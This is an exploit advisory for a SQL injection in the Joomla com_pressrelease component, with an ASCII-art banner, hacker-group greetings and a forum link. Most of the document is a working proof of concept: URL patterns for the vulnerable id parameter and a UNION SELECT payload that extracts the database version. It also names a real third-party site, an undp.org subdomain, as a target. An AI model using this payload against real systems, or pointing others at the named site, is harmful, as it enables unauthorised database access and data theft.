The Joomla Press Release component suffers from a remote SQL injection vulnerability.
13b7eddd3563f35b8066c55b1597e1d0cd7e2c1a173904cd807b1cd97f691b76
/*
_____ _ ___ __
| ____|_ _(_) \ \ / /_ _ _ _
| _| \ \ / / | |\ \ /\ / / _` | | | |
| |___ \ V /| | | \ V V / (_| | |_| |
|_____| \_/ |_|_| \_/\_/ \__,_|\__, |
|___/
_____
|_ _|__ __ _ _ __ ___
| |/ _ \/ _` | '_ ` _ \
| | __/ (_| | | | | | |
|_|\___|\__,_|_| |_| |_|
Joomla Component com_pressrelease (id) SQL Injection Vulnerability
Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : OFF
Greetings : Mizoz, Zuka, str0ke, 599eme Man.
Please visit: https://unkn0wn.ws/board/index.php
*/
[+] Exploit SQL INJECTION:
- Joomla : com_pressrelease .
- Poc:
https://127.0.0.1/index.php?option=com_pressrelease&id=[SQL]
https://www.et.undp.org/index.php?option=com_pressrelease&id=
SQL: null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--